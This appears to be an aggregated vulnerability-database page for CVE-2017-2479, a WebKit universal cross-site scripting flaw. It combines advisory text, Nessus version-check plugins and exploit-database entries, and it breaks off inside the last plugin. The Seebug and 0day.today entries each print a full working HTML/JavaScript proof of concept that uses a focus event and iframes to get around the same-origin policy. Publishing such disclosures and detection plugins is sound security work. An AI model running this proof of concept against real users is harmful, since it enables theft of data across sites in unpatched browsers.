An issue was discovered in certain Apple products. iOS before 10.3 is
affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is
affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is
affected. The issue involves the "WebKit" component. It allows remote
attackers to bypass the Same Origin Policy and obtain sensitive information
via a crafted web site.
#### Notes
Author| Note
---|---
[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8
{"seebug": [{"lastseen": "2017-11-19T12:00:00", "description": "This is somewhat similar to https://crbug.com/663476.\r\n\r\nHere's a snippet of Container::replaceAllChildren.\r\n\r\n```\r\nwhile (RefPtr<Node> child = m_firstChild) {\r\n removeBetween(nullptr, child->nextSibling(), *child);\r\n notifyChildNodeRemoved(*this, *child);\r\n}\r\n```\r\n\r\nIf the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up to fire a focus event which runs arbitrary JavaScript code, which can make an iframe(|g| in the PoC) that has an attached frame but has no parent.\r\n\r\nTested on Safari 10.0.3(12602.4.8).\r\n\r\n```\r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet inp = f.contentDocument.head.appendChild(document.createElement('input'));\r\nlet link = inp.appendChild(document.createElement('link'));\r\nlink.rel = 'stylesheet';\r\nlink.href = 'data:,aaaaazxczxczzxzcz';\r\n\r\nlet btn = f.contentDocument.body.appendChild(document.createElement('button'));\r\nbtn.id = 'btn';\r\nbtn.onfocus = () => {\r\n btn.onfocus = null;\r\n\r\n window.g = inp.appendChild(document.createElement('iframe'));\r\n window.g.onload = () => {\r\n window.g.onload = null;\r\n\r\n window.g.src = 'javascript:alert(location)';\r\n let xml = `\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<script>\r\ndocument.documentElement.appendChild(parent.g);\r\n\r\n</sc` + `ript>\r\n<element a=\"1\" a=\"2\" />\r\n</svg>`;\r\n\r\n let h = document.body.appendChild(document.createElement('iframe'));\r\n h.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));\r\n };\r\n\r\n window.g.src = 'https://abc.xyz/';\r\n};\r\n\r\nf.contentWindow.location.hash = 'btn';\r\ninp.textContent = '';\r\n\r\n</script>\r\n</body>\r\n</html>\r\n```", "cvss3": {}, "published": "2017-04-07T00:00:00", "type": "seebug", "title": "WebKit: UXSS via a focus event and a link element (CVE-2017-2479)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2479"], "modified": "2017-04-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92922", "id": "SSV:92922", "sourceData": "\n <html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet inp = f.contentDocument.head.appendChild(document.createElement('input'));\r\nlet link = inp.appendChild(document.createElement('link'));\r\nlink.rel = 'stylesheet';\r\nlink.href = 'data:,aaaaazxczxczzxzcz';\r\n\r\nlet btn = f.contentDocument.body.appendChild(document.createElement('button'));\r\nbtn.id = 'btn';\r\nbtn.onfocus = () => {\r\n btn.onfocus = null;\r\n\r\n window.g = inp.appendChild(document.createElement('iframe'));\r\n window.g.onload = () => {\r\n window.g.onload = null;\r\n\r\n window.g.src = 'javascript:alert(location)';\r\n let xml = `\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<script>\r\ndocument.documentElement.appendChild(parent.g);\r\n\r\n</sc` + `ript>\r\n<element a=\"1\" a=\"2\" />\r\n</svg>`;\r\n\r\n let h = document.body.appendChild(document.createElement('iframe'));\r\n h.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));\r\n };\r\n\r\n window.g.src = 'https://abc.xyz/';\r\n};\r\n\r\nf.contentWindow.location.hash = 'btn';\r\ninp.textContent = '';\r\n\r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92922", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-10T02:10:16", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "zdt", "title": "Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2479"], "modified": "2017-04-12T00:00:00", "id": "1337DAY-ID-27571", "href": "https://0day.today/exploit/description/27571", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1119\r\n \r\nThis is somewhat similar to https://crbug.com/663476.\r\n \r\nHere's a snippet of Container::replaceAllChildren.\r\n \r\nwhile (RefPtr<Node> child = m_firstChild) {\r\n removeBetween(nullptr, child->nextSibling(), *child);\r\n notifyChildNodeRemoved(*this, *child);\r\n}\r\n \r\nIf the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up to fire a focus event which runs arbitrary JavaScript code, which can make an iframe(|g| in the PoC) that has an attached frame but has no parent.\r\n \r\nTested on Safari 10.0.3(12602.4.8).\r\n-->\r\n \r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n \r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet inp = f.contentDocument.head.appendChild(document.createElement('input'));\r\nlet link = inp.appendChild(document.createElement('link'));\r\nlink.rel = 'stylesheet';\r\nlink.href = 'data:,aaaaazxczxczzxzcz';\r\n \r\nlet btn = f.contentDocument.body.appendChild(document.createElement('button'));\r\nbtn.id = 'btn';\r\nbtn.onfocus = () => {\r\n btn.onfocus = null;\r\n \r\n window.g = inp.appendChild(document.createElement('iframe'));\r\n window.g.onload = () => {\r\n window.g.onload = null;\r\n \r\n window.g.src = 'javascript:alert(location)';\r\n let xml = `\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<script>\r\ndocument.documentElement.appendChild(parent.g);\r\n \r\n</sc` + `ript>\r\n<element a=\"1\" a=\"2\" />\r\n</svg>`;\r\n \r\n let h = document.body.appendChild(document.createElement('iframe'));\r\n h.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));\r\n };\r\n \r\n window.g.src = 'https://abc.xyz/';\r\n};\r\n \r\nf.contentWindow.location.hash = 'btn';\r\ninp.textContent = '';\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/27571", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2022-03-23T15:51:28", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2479", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479"], "modified": "2019-03-19T13:40:00", "cpe": [], "id": "CVE-2017-2479", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2479", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2023-01-11T14:24:45", "description": "Versions of iTunes prior to 12.6 are affected by multiple vulnerabilities :\n\n - A use-after-free condition exists that is triggered when handling RenderBox objects. With specially crafted web content, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2463)\n - A flaw exists that allows a universal cross-site scripting (UXSS) attack. This flaw exists because the 'notifyChildNodeRemoved()' function in 'WebCore/dom/ContainerNodeAlgorithms.cpp' executes script code synchronously. This may allow a context-dependent attacker to create a specially crafted web page that executes arbitrary script code in a user's browser session within the trust relationship between their browser and any server. (CVE-2017-2479)\n - A flaw exists that allows a UXSS attack. This flaw exists because the program does not properly revalidates the 'SubframeLoader::requestFrame()' function in 'WebCore/loader/SubframeLoader.cpp'. This may allow a context-dependent attacker to create a specially crafted web page that executes arbitrary script code in a user's browser session within the trust relationship between their browser and any server. (CVE-2017-2480)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "iTunes < 12.6 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:itunes:*:*:*:*:*:*:*:*"], "id": "700114.PRM", "href": "https://www.tenable.com/plugins/nnm/700114", "sourceData": "Binary data 700114.prm", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:24:51", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.6. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple vulnerabilities exist in the expat component, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities to cause a denial of service condition or the execution of arbitrary code in the context of the current user. (CVE-2009-3270, CVE-2009-3560, CVE-2009-3720, CVE-2012-1147, CVE-2012-1148, CVE-2012-6702, CVE-2015-1283, CVE-2016-0718, CVE-2016-4472, CVE-2016-5300)\n\n - Multiple vulnerabilities exist in the SQLite component, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities by convincing a user to open a specially crafted file, to cause a denial of service condition or the execution of arbitrary code in the context of the current user. (CVE-2013-7443, CVE-2015-3414, CVE-2015-3415, CVE-2015-3416, CVE-2015-3717, CVE-2015-6607, CVE-2016-6153)\n\n - An information disclosure vulnerability exists in the APNs server component due to client certificates being transmitted in cleartext. A man-in-the-middle attacker can exploit this to disclose sensitive information.\n (CVE-2017-2383)\n\n - A use-after-free error exists in the WebKit component due to improper handling of RenderBox objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2463)\n\n - Multiple universal cross-site scripting (XSS) vulnerabilities exist in the WebKit component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these vulnerabilities, by convincing a user to visit a specially crafted web page, to execute arbitrary script code in a user's browser session. (CVE-2017-2479, CVE-2017-2480, CVE-2017-2493)\n\n - An integer overflow condition exists in the libxslt component in the xsltAddTextString() function in transform.c due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause an out-of-bounds write, resulting in the execution of arbitrary code. (CVE-2017-5029)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.6 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3270", "CVE-2009-3560", "CVE-2009-3720", "CVE-2012-1147", "CVE-2012-1148", "CVE-2012-6702", "CVE-2013-7443", "CVE-2015-1283", "CVE-2015-3414", "CVE-2015-3415", "CVE-2015-3416", "CVE-2015-3717", "CVE-2015-6607", "CVE-2016-0718", "CVE-2016-4472", "CVE-2016-5300", "CVE-2016-6153", "CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6.NASL", "href": "https://www.tenable.com/plugins/nessus/100025", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100025);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2009-3270\",\n \"CVE-2009-3560\",\n \"CVE-2009-3720\",\n \"CVE-2012-1147\",\n \"CVE-2012-1148\",\n \"CVE-2012-6702\",\n \"CVE-2013-7443\",\n \"CVE-2015-1283\",\n \"CVE-2015-3414\",\n \"CVE-2015-3415\",\n \"CVE-2015-3416\",\n \"CVE-2015-3717\",\n \"CVE-2015-6607\",\n \"CVE-2016-0718\",\n \"CVE-2016-4472\",\n \"CVE-2016-5300\",\n \"CVE-2016-6153\",\n \"CVE-2017-2383\",\n \"CVE-2017-2463\",\n \"CVE-2017-2479\",\n \"CVE-2017-2480\",\n \"CVE-2017-5029\"\n );\n script_bugtraq_id(\n 36097,\n 37203,\n 52379,\n 74228,\n 75491,\n 75973,\n 76089,\n 76970,\n 79354,\n 90729,\n 91159,\n 91483,\n 91528,\n 91546,\n 96767,\n 97175,\n 97176\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-22-1\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-28-2\");\n script_xref(name:\"EDB-ID\", value:\"12509\");\n\n script_name(english:\"Apple iTunes < 12.6 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.6. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple vulnerabilities exist in the expat component,\n the most severe of which are remote code execution\n vulnerabilities. An unauthenticated, remote attacker can\n exploit these vulnerabilities to cause a denial of\n service condition or the execution of arbitrary code in\n the context of the current user. (CVE-2009-3270,\n CVE-2009-3560, CVE-2009-3720, CVE-2012-1147,\n CVE-2012-1148, CVE-2012-6702, CVE-2015-1283,\n CVE-2016-0718, CVE-2016-4472, CVE-2016-5300)\n\n - Multiple vulnerabilities exist in the SQLite component,\n the most severe of which are remote code execution\n vulnerabilities. An unauthenticated, remote attacker can\n exploit these vulnerabilities by convincing a user to\n open a specially crafted file, to cause a denial of\n service condition or the execution of arbitrary code in\n the context of the current user. (CVE-2013-7443,\n CVE-2015-3414, CVE-2015-3415, CVE-2015-3416,\n CVE-2015-3717, CVE-2015-6607, CVE-2016-6153)\n\n - An information disclosure vulnerability exists in the\n APNs server component due to client certificates being\n transmitted in cleartext. A man-in-the-middle attacker\n can exploit this to disclose sensitive information.\n (CVE-2017-2383)\n\n - A use-after-free error exists in the WebKit component\n due to improper handling of RenderBox objects. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2017-2463)\n\n - Multiple universal cross-site scripting (XSS)\n vulnerabilities exist in the WebKit component due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, by convincing a user to visit a\n specially crafted web page, to execute arbitrary script\n code in a user's browser session. (CVE-2017-2479,\n CVE-2017-2480, CVE-2017-2493)\n\n - An integer overflow condition exists in the libxslt\n component in the xsltAddTextString() function in\n transform.c due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this to cause an out-of-bounds write, resulting in the\n execution of arbitrary code. (CVE-2017-5029)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207599\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00000.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d1057132\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00010.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?65be44ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0718\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.6\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T14:24:52", "description": "The version of Apple iTunes running on the remote host is prior to 12.6. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple vulnerabilities exist in the expat component, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities to cause a denial of service condition or the execution of arbitrary code in the context of the current user. (CVE-2009-3270, CVE-2009-3560, CVE-2009-3720, CVE-2012-1147, CVE-2012-1148, CVE-2012-6702, CVE-2015-1283, CVE-2016-0718, CVE-2016-4472, CVE-2016-5300)\n\n - Multiple vulnerabilities exist in the SQLite component, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities by convincing a user to open a specially crafted file, to cause a denial of service condition or the execution of arbitrary code in the context of the current user. (CVE-2013-7443, CVE-2015-3414, CVE-2015-3415, CVE-2015-3416, CVE-2015-3717, CVE-2015-6607, CVE-2016-6153)\n\n - An information disclosure vulnerability exists in the APNs server component due to client certificates being transmitted in cleartext. A man-in-the-middle attacker can exploit this to disclose sensitive information.\n (CVE-2017-2383)\n\n - A use-after-free error exists in the WebKit component due to improper handling of RenderBox objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2463)\n\n - Multiple universal cross-site scripting (XSS) vulnerabilities exist in the WebKit component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these vulnerabilities, by convincing a user to visit a specially crafted web page, to execute arbitrary script code in a user's browser session. (CVE-2017-2479, CVE-2017-2480, CVE-2017-2493)\n\n - An integer overflow condition exists in the libxslt component in the xsltAddTextString() function in transform.c due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause an out-of-bounds write, resulting in the execution of arbitrary code. (CVE-2017-5029)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.6 Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3270", "CVE-2009-3560", "CVE-2009-3720", "CVE-2012-1147", "CVE-2012-1148", "CVE-2012-6702", "CVE-2013-7443", "CVE-2015-1283", "CVE-2015-3414", "CVE-2015-3415", "CVE-2015-3416", "CVE-2015-3717", "CVE-2015-6607", "CVE-2016-0718", "CVE-2016-4472", "CVE-2016-5300", "CVE-2016-6153", "CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/100026", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100026);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2009-3270\",\n \"CVE-2009-3560\",\n \"CVE-2009-3720\",\n \"CVE-2012-1147\",\n \"CVE-2012-1148\",\n \"CVE-2012-6702\",\n \"CVE-2013-7443\",\n \"CVE-2015-1283\",\n \"CVE-2015-3414\",\n \"CVE-2015-3415\",\n \"CVE-2015-3416\",\n \"CVE-2015-3717\",\n \"CVE-2015-6607\",\n \"CVE-2016-0718\",\n \"CVE-2016-4472\",\n \"CVE-2016-5300\",\n \"CVE-2016-6153\",\n \"CVE-2017-2383\",\n \"CVE-2017-2463\",\n \"CVE-2017-2479\",\n \"CVE-2017-2480\",\n \"CVE-2017-5029\"\n );\n script_bugtraq_id(\n 36097,\n 37203,\n 52379,\n 74228,\n 75491,\n 75973,\n 76089,\n 76970,\n 79354,\n 90729,\n 91159,\n 91483,\n 91528,\n 91546,\n 96767,\n 97175,\n 97176\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-22-1\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-28-2\");\n script_xref(name:\"EDB-ID\", value:\"12509\");\n\n script_name(english:\"Apple iTunes < 12.6 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes running on the remote host is prior to\n12.6. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple vulnerabilities exist in the expat component,\n the most severe of which are remote code execution\n vulnerabilities. An unauthenticated, remote attacker can\n exploit these vulnerabilities to cause a denial of\n service condition or the execution of arbitrary code in\n the context of the current user. (CVE-2009-3270,\n CVE-2009-3560, CVE-2009-3720, CVE-2012-1147,\n CVE-2012-1148, CVE-2012-6702, CVE-2015-1283,\n CVE-2016-0718, CVE-2016-4472, CVE-2016-5300)\n\n - Multiple vulnerabilities exist in the SQLite component,\n the most severe of which are remote code execution\n vulnerabilities. An unauthenticated, remote attacker can\n exploit these vulnerabilities by convincing a user to\n open a specially crafted file, to cause a denial of\n service condition or the execution of arbitrary code in\n the context of the current user. (CVE-2013-7443,\n CVE-2015-3414, CVE-2015-3415, CVE-2015-3416,\n CVE-2015-3717, CVE-2015-6607, CVE-2016-6153)\n\n - An information disclosure vulnerability exists in the\n APNs server component due to client certificates being\n transmitted in cleartext. A man-in-the-middle attacker\n can exploit this to disclose sensitive information.\n (CVE-2017-2383)\n\n - A use-after-free error exists in the WebKit component\n due to improper handling of RenderBox objects. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2017-2463)\n\n - Multiple universal cross-site scripting (XSS)\n vulnerabilities exist in the WebKit component due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, by convincing a user to visit a\n specially crafted web page, to execute arbitrary script\n code in a user's browser session. (CVE-2017-2479,\n CVE-2017-2480, CVE-2017-2493)\n\n - An integer overflow condition exists in the libxslt\n component in the xsltAddTextString() function in\n transform.c due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this to cause an out-of-bounds write, resulting in the\n execution of arbitrary code. (CVE-2017-5029)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207599\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207598\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00000.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d1057132\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8b01bc68\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00010.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?65be44ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0718\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n 